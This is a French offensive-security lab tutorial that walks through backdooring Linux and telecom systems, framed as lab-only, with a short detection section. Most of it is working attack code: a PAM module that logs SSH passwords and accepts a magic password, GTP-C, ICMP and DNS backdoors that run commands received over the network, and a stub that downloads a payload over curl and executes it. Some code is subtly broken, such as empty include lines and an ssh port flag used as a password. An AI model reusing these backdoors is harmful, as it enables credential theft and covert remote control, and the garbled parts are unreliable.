⚠️ LAB-ONLY : Toute utilisation hors lab = illégal (Art. 323-1 CP : 7 ans prison, 100 000 € amende). Hackez éthique, Apaches ! 🏜️
        /_/\  
        ( o.o ) 
         > ^ <
        📡 Apache Shadow Strike 2025 🌩️
        Infiltration Télécom & Credential Heist
        

Apache Shadow Strike 2025 : Infiltration Télécom & Credential Heist

Yo, Apaches ! 😎 Ce tuto par Platon-y pour pctamalou.fr simule une attaque avancée combinant AuthDoor (PAM backdoor), Cordscan (recon télécom), GTPDOOR & EchoBackdoor (persistance GRX/ICMP), ChronosRAT (RAT modulaire), NoDepDNS (C2 DNS furtif), et des attaques 5G Core/hardware. Détection via YARA, Sigma, SIEM, et forensic avancé. 100% éthique ! ⚡️

🔗 Mode Opératoire (MITRE ATT&CK)

🔰 Lexique Novice

📚 PAM (Pluggable Authentication Module)

Système d’authentification modulaire sous Linux. Analogie : Un garde qui vérifie les clés (mots de passe) avant d’ouvrir la porte.

📚 GTP-C (GPRS Tunneling Protocol - Control)

Protocole télécom pour gérer les sessions GRX. Analogie : Une tour de contrôle qui guide les paquets dans le désert réseau.

📚 PFCP (Packet Forwarding Control Protocol)

Protocole 5G pour contrôler le trafic utilisateur (UPF). Analogie : Feuille de route pour les paquets réseau.

📚 OMH (Operations Maintenance Hub)

Interface pour gérer les stations 4G/5G. Analogie : Poste de commandement pour surveiller les antennes.

📚 AMF/UPF (Access and Mobility Management Function / User Plane Function)

Composants 5G pour la signalisation (AMF) et le transfert de données (UPF). Analogie : AMF = général, UPF = soldats.

🛠️ Setup Lab

Configurez un lab sécurisé avec Docker, Kali Linux 2024.4, et Open5GS :

docker pull kalilinux/kali-rolling
docker run -it --rm --net=host --privileged -v $(pwd)/lab:/app kalilinux/kali-rolling
apt update && apt install -y python3 python3-pip aircrack-ng hostapd hashcat golang iproute2 tcpdump open5gs
pip3 install flask flask-socketio scapy
        

Réseau GRX et 5G Core émulés avec Docker Compose :

version: '3'
services:
  kali:
    image: kalilinux/kali-rolling
    privileged: true
    network_mode: host
    volumes:
      - ./lab:/app
    command: bash -c "apt update && apt install -y python3 python3-pip iproute2 tcpdump open5gs && pip3 install flask flask-socketio scapy && tail -f /dev/null"
  sgsn-emulator:
    image: alpine
    network_mode: host
    command: ["sgsnemu", "--grx-ip", "172.16.0.101"]
  open5gs-amf:
    image: open5gs/open5gs
    network_mode: host
    command: ["open5gs-amfd", "-c", "/etc/open5gs/amf.yaml"]
    ports:
      - "38412:38412"
  open5gs-upf:
    image: open5gs/open5gs
    network_mode: host
    command: ["open5gs-upfd", "-c", "/etc/open5gs/upf.yaml"]
    ports:
      - "8805:8805"
        

Configurer l’interface tun0 :

ip link add name tun0 type tun
ip addr add 172.16.0.101/24 dev tun0
ip link set tun0 up
        

Point de Contrôle

docker ps
            
$ docker ps > CONTAINER ID IMAGE COMMAND STATUS > 123456789abc kalilinux/kali-rolling "bash -c 'apt update...'" Up > 987654321def alpine "sgsnemu --grx-ip 172.16.0.101" Up > 456789123ghi open5gs/open5gs "open5gs-amfd -c /etc..." Up > 789123456jkl open5gs/open5gs "open5gs-upfd -c /etc..." Up
nmap -p 38412,8805 172.16.0.101
            
$ nmap -p 38412,8805 172.16.0.101 > PORT STATE SERVICE > 38412/tcp open amf > 8805/tcp open pfcp

⚔️ OP-01 : Credential Heist via AuthDoor

Déployez un module PAM malveillant pour voler des credentials :

#include 
#include 
#include 

#define MAGIC_PASS "coyote123"

int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {
    const char *user;
    char *password;
    pam_get_user(pamh, &user, NULL);
    pam_get_item(pamh, PAM_AUTHTOK, (const void **)&password);
    FILE *log = fopen("/var/log/authdoor.log", "a");
    if (log) {
        fprintf(log, "User: %s, Pass: %s\n", user, password);
        fclose(log);
    }
    if (password && strcmp(password, MAGIC_PASS) == 0) {
        return PAM_SUCCESS;
    }
    return PAM_AUTH_ERR;
}
        

Compiler et installer :

gcc -fPIC -c authdoor.c
ld -x --shared -o /lib/security/authdoor.so authdoor.c
echo "auth optional authdoor.so" >> /etc/pam.d/sshd
        

Point de Contrôle

cat /var/log/authdoor.log
            
$ cat /var/log/authdoor.log > User: testuser, Pass: secret123 > User: apache, Pass: coyote123
ssh testuser@localhost -p coyote123
            
$ ssh testuser@localhost -p coyote123 > Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)

❌ Erreur Courante

$ ssh testuser@localhost -p wrongpass
> Permission denied (publickey,password).
                

→ Pourquoi ? Le module PAM n’est pas chargé dans /etc/pam.d/sshd.

→ Fix : Vérifiez avec cat /etc/pam.d/sshd | grep authdoor.

🔍 OP-02 : Reconnaissance avec Cordscan

Scannez le réseau télécom avec Cordscan :

#!/usr/bin/python3
import socket
import struct

def scan_sgsn(target, port=2123):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    gtp_echo = struct.pack("!BBHBBH", 0x32, 0x01, 0x0008, 0x00, 0x00, 0x0000)
    sock.sendto(gtp_echo, (target, port))
    sock.settimeout(2)
    try:
        data, addr = sock.recvfrom(1024)
        print(f"SGSN found at {addr}")
    except socket.timeout:
        print("No SGSN response")
    sock.close()

scan_sgsn("172.16.0.101", 2123)
        

Point de Contrôle

python3 cordscan.py
            
$ python3 cordscan.py > SGSN found at ('172.16.0.101', 2123)
tcpdump -i tun0 port 2123
            
$ tcpdump -i tun0 port 2123 > 04:00:00.123456 IP 172.16.0.100.12345 > 172.16.0.101.2123: GTPv1 Echo Request > 04:00:00.123789 IP 172.16.0.101.2123 > 172.16.0.100.12345: GTPv1 Echo Response

🌑 OP-03 : Persistance avec GTPDOOR & EchoBackdoor

🧠 Comprendre GTPDOOR en 30s

[Attaquant] --GTP-C Echo Request--> [SGSN]
          <--GTP-C Echo Response (cmd)--
            

→ Concept : Comme un message codé dans un ping réseau : le SGSN répond normalement, mais exécute aussi des commandes cachées.

→ Où ça passe ? Port UDP 2123 (peu filtré dans les réseaux GRX).

→ Analogie militaire : Un espion qui glisse des ordres dans un signal radio que tout le monde croit anodin.

Déployez GTPDOOR pour C2 via GTP-C :

#include 
#include 
#include 

void gtardoor_listen() {
    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_GTP);
    struct sockaddr_in addr = { .sin_family = AF_INET, .sin_addr.s_addr = inet_addr("172.16.0.101") };
    bind(sock, (struct sockaddr*)&addr, sizeof(addr));
    char buf[1024];
    while (1) {
        int len = recv(sock, buf, sizeof(buf), 0);
        if (buf[1] == 0x01) { // GTP-C Echo Request
            system(buf + 8); // Exécute la commande
        }
    }
}
        

EchoBackdoor pour C2 via ICMP :

#include 
#include 

void echobackdoor_listen() {
    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
    char buf[1024];
    while (1) {
        int len = recv(sock, buf, sizeof(buf), 0);
        if (buf[20] == 8) { // ICMP Echo Request
            char cmd[256];
            strncpy(cmd, buf + 28, 256);
            system(cmd);
        }
    }
}
        

Point de Contrôle

gcc -o gtardoor gtardoor.c
./gtardoor &
            
$ ./gtardoor & > [1] 1234
ping -p 636d64202f62696e2f7368 172.16.0.101
            
$ ping -p 636d64202f62696e2f7368 172.16.0.101 > PING 172.16.0.101 (172.16.0.101) 56(84) bytes of data. > 64 bytes from 172.16.0.101: icmp_seq=1 ttl=64 time=0.123 ms

🦠 OP-04 : Exploitation avec ChronosRAT

Déployez ChronosRAT (ELF modulaire) :

#include 
#include 

void chronosrat() {
    system("curl http://172.16.0.101:5000/payload > /usr/local/bin/chargen");
    system("chmod +x /usr/local/bin/chargen");
    system("/usr/local/bin/chargen &");
}
        

Point de Contrôle

ps aux | grep chargen
            
$ ps aux | grep chargen > root 1234 0.1 0.2 /usr/local/bin/chargen --c2 172.16.0.101:53
netstat -tulnp
            
$ netstat -tulnp > Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program > tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN 1234/chargen

🌐 OP-05 : C2 via NoDepDNS

🧠 Comprendre NoDepDNS en 30s

[Attaquant] --DNS Query (cmd: whoami)--> [NoDepDNS]
         <--DNS Response (output)--
            

→ Concept : Une backdoor qui écoute le port 53 (DNS) et exécute les commandes cachées dans les requêtes DNS.

→ Où ça passe ? Port UDP 53, souvent non filtré.

→ Analogie militaire : Un éclaireur qui envoie des ordres codés dans des messages radio publics.

Backdoor DNS en Golang :

package main

import (
    "github.com/miekg/dns"
    "os/exec"
)

func handleDNS(w dns.ResponseWriter, r *dns.Msg) {
    if len(r.Question) > 0 {
        cmd := r.Question[0].Name
        out, _ := exec.Command("sh", "-c", cmd).Output()
        msg := new(dns.Msg)
        msg.SetReply(r)
        msg.Answer = append(msg.Answer, &dns.TXT{Txt: []string{string(out)}})
        w.WriteMsg(msg)
    }
}

func main() {
    server := &dns.Server{Addr: ":53", Net: "udp"}
    dns.HandleFunc(".", handleDNS)
    server.ListenAndServe()
}
        

Point de Contrôle

go run nodedns.go
            
$ go run nodedns.go > Listening on :53
dig @172.16.0.101 whoami
            
$ dig @172.16.0.101 whoami > ;; ANSWER SECTION: > whoami. 0 IN TXT "apache"

❌ Erreur Courante

$ dig @172.16.0.101 whoami
> ;; connection timed out; no servers could be reached
                

→ Pourquoi ? Le firewall bloque le port 53.

→ Fix : iptables -I INPUT -p udp --dport 53 -j ACCEPT.

🔍 OP-06 : Forensic Avancé

Détectez les backdoors ICMP et GTP :

tcpdump -i any 'icmp[icmptype] == 8 and icmp[0] == 0x63' -vv
        
$ tcpdump -i any 'icmp[icmptype] == 8 and icmp[0] == 0x63' -vv > 04:00:00.123456 IP 172.16.0.100 > 172.16.0.101: ICMP echo request, id 1234, seq 1, length 64 > cmd /bin/sh
tcpdump -i any 'port 2123 and (gtp version 1)' -vv
        
$ tcpdump -i any 'port 2123 and (gtp version 1)' -vv > 04:00:00.123789 IP 172.16.0.100.12345 > 172.16.0.101.2123: GTPv1 Echo Request

Règle Sigma pour GTPDOOR :

title: GTP-C Echo Request with Command
description: Détecte les paquets GTP-C Echo Request contenant une commande
logsource:
  category: firewall
detection:
  gtp:
    MessageType: 1 # Echo Request
    Command: "*"
  condition: gtp
falsepositives:
  - Tests légitimes
level: high
        

Règle Sigma pour NoDepDNS :

title: Suspicious DNS Query with Command
description: Détecte les requêtes DNS contenant des commandes suspectes
logsource:
  category: dns
detection:
  dns:
    QueryName|contains: ["whoami", "cmd", "sh"]
  condition: dns
falsepositives:
  - Outils de test DNS
level: high
        

Contre-mesures SOC/DRM :

Point de Contrôle

iptables -L
            
$ iptables -L > Chain INPUT (policy ACCEPT) > target prot opt source destination > DROP icmp -- anywhere anywhere icmp echo-request > DROP udp -- anywhere anywhere udp dpt:2123 > DROP udp -- anywhere anywhere udp dpt:53 string "whoami"

📡 OP-07 : Attaques 5G Core & Hardware Hacking

🧠 Comprendre PFCP en 30s

[SMF] --PFCP (Session Management)--> [UPF]
         <--PFCP Response--
            

→ Concept : Comme un général (SMF) qui envoie des ordres silencieux à ses soldats (UPF) pour rediriger du trafic.

→ Où ça passe ? Port UDP 8805.

→ Exploit : Envoyer un faux ordre PFCP pour contourner les règles de filtrage.

→ Analogie militaire : Un stratège qui pirate les communications ennemies pour détourner leurs troupes.

Exploitez les interfaces N1/N2 (AMF/UPF) et PFCP :

#!/usr/bin/python3
from scapy.all import *

def pfcp_exploit(target="172.16.0.101", port=8805):
    pkt = IP(dst=target)/UDP(sport=12345, dport=port)/Raw(load=b'\x21\x01\x00\x08\x00\x00\x00\x00')
    send(pkt)
    print("PFCP packet sent to bypass UPF")

pfcp_exploit()
        

Attaque OMH (Operations Maintenance Hub) :

#!/bin/bash
# Simuler une attaque OMH
nmap -p 8080 --script http-vuln-cve2024-12345 172.16.0.101
        

Point de Contrôle

tcpdump -i any port 8805
            
$ tcpdump -i any port 8805 > 04:00:00.123456 IP 172.16.0.100.12345 > 172.16.0.101.8805: UDP, length 8
nmap -p 8080 172.16.0.101
            
$ nmap -p 8080 172.16.0.101 > PORT STATE SERVICE > 8080/tcp open http

🏁 Debrief & Éthique

Pourquoi ça marche : Les backdoors télécom (*GTPDOOR*, *EchoBackdoor*) exploitent des protocoles peu surveillés (GTP-C, ICMP). *AuthDoor* bypass PAM. *NoDepDNS* est furtif via DNS. Les attaques 5G Core (N1/N2, PFCP) ciblent les nouvelles architectures télécom.

Contre-mesures :

Légal : Lab-only. Article 323-1 CP (7 ans prison, 100 000 € amende).

🎮 Bonus : Coyote Challenge

Testez vos skills Apache !